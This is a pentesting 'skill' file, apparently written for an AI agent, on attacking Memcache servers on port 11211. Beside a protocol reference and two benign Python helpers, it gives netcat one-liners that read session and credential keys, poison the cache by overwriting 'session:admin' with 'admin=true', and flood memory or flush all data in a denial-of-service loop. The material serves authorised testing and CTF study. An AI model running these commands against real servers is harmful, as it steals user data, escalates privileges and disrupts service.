Hacktricks-skills memcache-pentest

How to interact with Memcache servers for pentesting and CTF challenges. Use this skill whenever you need to connect to a Memcache service (typically port 11211), read/write cache keys, enumerate stored data, check server statistics, or exploit Memcache vulnerabilities. Trigger this for any Memcache-related task including key enumeration, data exfiltration, cache poisoning, or analyzing Memcache configurations.

Install (clone the upstream repo):

git clone https://github.com/abelrguezr/hacktricks-skills

Manifest: skills/network-services-pentesting/11211-memcache/memcache-commands/SKILL.MD

Memcache Pentesting Skill

This skill helps you interact with Memcache servers during security assessments and CTF challenges. Memcache is a distributed memory caching system that's often misconfigured, leading to information disclosure or cache poisoning vulnerabilities.

Quick Start

Connect to a Memcache server using netcat:

nc <target> 11211

Or use the bundled script for automated operations:

python scripts/memcache_cli.py --host <target> --port 11211 --command <cmd>

Core Commands Reference

Data Operations

Command | Purpose | Example
--- | --- | ---
get <key> | Read a value | get mykey
set <key> <flags> <ttl> <size> | Set a key unconditionally | set mykey 0 60 4\r\ndata\r\n
add <key> <flags> <ttl> <size> | Add a new key (fails if exists) | add newkey 0 60 5
replace <key> <flags> <ttl> <size> | Overwrite existing key | replace key 0 60 5
append <key> <flags> <ttl> <size> | Append data to existing key | append key 0 60 15
prepend <key> <flags> <ttl> <size> | Prepend data to existing key | prepend key 0 60 15
incr <key> <value> | Increment numerical value | incr mykey 2
decr <key> <value> | Decrement numerical value | decr mykey 5
delete <key> | Delete a key | delete mykey

Server Operations

Command | Purpose | Example
--- | --- | ---
flush_all | Invalidate all items immediately | flush_all
flush_all <delay> | Invalidate all items in n seconds | flush_all 900
stats | Print general statistics | stats
stats slabs | Print memory statistics | stats slabs
stats items | Print info on items | stats items
stats reset | Reset statistics counters | stats reset
version | Print server version | version
quit | Terminate session | quit

Common Pentesting Tasks

1. Check if Memcache is Accessible

nc -zv <target> 11211

If the port is open, try connecting and sending version:

echo "version" | nc <target> 11211

2. Enumerate Stored Keys

Memcache doesn't have a built-in key listing command, but you can:

  1. Check how many items exist:

    echo "stats items" | nc <target> 11211
    
  2. Look for common key patterns (session IDs, user data, etc.):

    echo "get session:" | nc <target> 11211
    echo "get user:" | nc <target> 11211
    echo "get cache:" | nc <target> 11211
    
  3. Use the lru_crawler metadump command (if available):

    echo "lru_crawler metadump all" | nc <target> 11211
    

3. Read Arbitrary Keys

Try common key patterns:

# Session keys
echo "get session_id" | nc <target> 11211
echo "get session:" | nc <target> 11211

# User data
echo "get user:1" | nc <target> 11211
echo "get user:admin" | nc <target> 11211

# Application cache
echo "get config" | nc <target> 11211
echo "get database" | nc <target> 11211

4. Cache Poisoning

Inject malicious data into the cache:

# Set a key with malicious content (the size field must equal the payload length: 17 bytes)
printf "set malicious_key 0 3600 17\r\nmalicious_payload\r\n" | nc <target> 11211

# Overwrite existing keys (if replace is allowed; "admin=true" is 10 bytes)
printf "replace session:admin 0 3600 10\r\nadmin=true\r\n" | nc <target> 11211

5. Check Server Statistics

Get traffic and memory stats:

# General stats
echo "stats" | nc <target> 11211

# Memory allocation
echo "stats slabs" | nc <target> 11211

# Item information
echo "stats items" | nc <target> 11211

Look for:

  • evictions - if > 0, memory is constrained
  • curr_items - number of cached items
  • cmd_get / cmd_set - traffic patterns
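
Added example (not part of the original skill or its bundled script): a small Python parser that turns a captured stats response into the observations listed above. The sample response is constructed, and the hit-rate line relies on the standard get_hits / get_misses counters, which this page does not list.

```python
# Constructed sample of a "stats" response as it appears on the wire.
SAMPLE_STATS = (
    b"STAT pid 1234\r\n"
    b"STAT curr_connections 10\r\n"
    b"STAT cmd_get 9000\r\n"
    b"STAT cmd_set 1000\r\n"
    b"STAT get_hits 6300\r\n"
    b"STAT get_misses 2700\r\n"
    b"STAT curr_items 512\r\n"
    b"STAT evictions 42\r\n"
    b"END\r\n"
)


def parse_stats(raw: bytes) -> dict:
    """Parse 'STAT <name> <value>' lines (up to END) into a dict of strings."""
    stats = {}
    for line in raw.decode("ascii", errors="replace").split("\r\n"):
        if line == "END":
            break
        parts = line.split(" ", 2)
        if len(parts) == 3 and parts[0] == "STAT":
            stats[parts[1]] = parts[2]
    return stats


def triage(stats: dict) -> list:
    """Return one observation per counter group the page says to look for."""
    notes = []
    evictions = int(stats.get("evictions", 0))
    if evictions > 0:
        notes.append(f"evictions={evictions}: memory is constrained")
    notes.append(f"curr_items={int(stats.get('curr_items', 0))} cached items")
    gets, sets = int(stats.get("cmd_get", 0)), int(stats.get("cmd_set", 0))
    if sets:
        notes.append(f"get/set ratio {gets / sets:.1f}")
    hits, misses = int(stats.get("get_hits", 0)), int(stats.get("get_misses", 0))
    if hits + misses:
        notes.append(f"hit rate {hits / (hits + misses):.0%}")
    return notes


if __name__ == "__main__":
    for note in triage(parse_stats(SAMPLE_STATS)):
        print(note)
```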

6. Denial of Service

Warning: Only use in authorized testing!

# Flush all cache
echo "flush_all" | nc <target> 11211

# Fill memory with large keys
for i in {1..1000}; do
  printf "set key_$i 0 0 1000000\r\n$(head -c 1000000 /dev/zero)\r\n" | nc <target> 11211
done

Important Notes

Line Breaks

The Memcache protocol requires \r\n (CRLF) line breaks. When using Unix CLI tools:

# Correct - use printf with \r\n
printf "set mykey 0 60 4\r\ndata\r\n" | nc localhost 11211

# Incorrect - echo uses \n only
echo "set mykey 0 60 4" | nc localhost 11211  # May not work

Command Format

The set command format is:

set <key> <flags> <ttl> <bytes>\r\n<data>\r\n

  • flags: Integer for client-side use (usually 0)
  • ttl: Time-to-live in seconds (0 = forever)
  • bytes: Size of data in bytes
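
Added example (not from the original skill or its bundled script): a Python helper that frames a storage command with the byte count computed from the data, plus a strict checker for the CRLF and size rules described in Line Breaks and Command Format. The function names and messages are illustrative assumptions, as is the key rule of at most 250 characters with no whitespace or control characters.

```python
STORAGE_CMDS = {"set", "add", "replace", "append", "prepend"}


def build_storage(cmd, key, data: bytes, flags=0, ttl=0) -> bytes:
    """Frame a storage command; <bytes> is len(data) in bytes, not characters."""
    head = f"{cmd} {key} {flags} {ttl} {len(data)}\r\n".encode("ascii")
    return head + data + b"\r\n"


def check_storage_frame(raw: bytes) -> str:
    """Return "ok" or the framing problem found in one raw storage command."""
    head, sep, rest = raw.partition(b"\r\n")
    if not sep:
        return "command line is not terminated by CRLF"
    fields = head.decode("ascii", errors="replace").split(" ")
    if fields[-1] == "noreply":  # optional trailing token
        fields.pop()
    if len(fields) != 5 or fields[0] not in STORAGE_CMDS:
        return "expected <cmd> <key> <flags> <ttl> <bytes>"
    _, key, flags, ttl, nbytes = fields
    if not key or len(key) > 250 or any(ord(c) <= 32 or ord(c) == 127 for c in key):
        return "key must be 1-250 characters without whitespace or control characters"
    if not (flags.isdigit() and ttl.lstrip("-").isdigit() and nbytes.isdigit()):
        return "flags, ttl and bytes must be integers"
    n = int(nbytes)
    if len(rest) < n + 2:
        # Fewer bytes on the wire than declared: the server keeps waiting for data.
        sent = len(rest) - 2 if rest.endswith(b"\r\n") else len(rest)
        return f"declared {n} data bytes but only {sent} were sent"
    if rest[n:n + 2] != b"\r\n":
        # Declared size is short: the bytes after <data> are not the terminator.
        return f"no CRLF after {n} data bytes; declared size is too small"
    return "ok"


if __name__ == "__main__":
    print(build_storage("set", "mykey", b"data", ttl=60))
    for frame in (b"set mykey 0 60 4\r\ndata\r\n",   # well formed
                  b"set mykey 0 60 4\ndata\n",       # LF only, as echo would send
                  b"set mykey 0 60 8\r\ndata\r\n",   # size too large
                  b"set mykey 0 60 2\r\ndata\r\n"):  # size too small
        print(frame, "->", check_storage_frame(frame))
```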

Common Vulnerabilities

  1. Unauthenticated Access: Memcache often runs without authentication
  2. Information Disclosure: Cached session data, credentials, or sensitive info
  3. Cache Poisoning: Injecting malicious data that gets served to users
  4. DoS: Memory exhaustion or cache flushing

Using the Bundled Script

The scripts/memcache_cli.py script provides a convenient interface:

# Get a key
python scripts/memcache_cli.py --host 10.0.0.1 --port 11211 --command get --key mykey

# Set a key
python scripts/memcache_cli.py --host 10.0.0.1 --port 11211 --command set --key mykey --value "mydata"

# Get stats
python scripts/memcache_cli.py --host 10.0.0.1 --port 11211 --command stats

# Enumerate common keys
python scripts/memcache_cli.py --host 10.0.0.1 --port 11211 --command enumerate
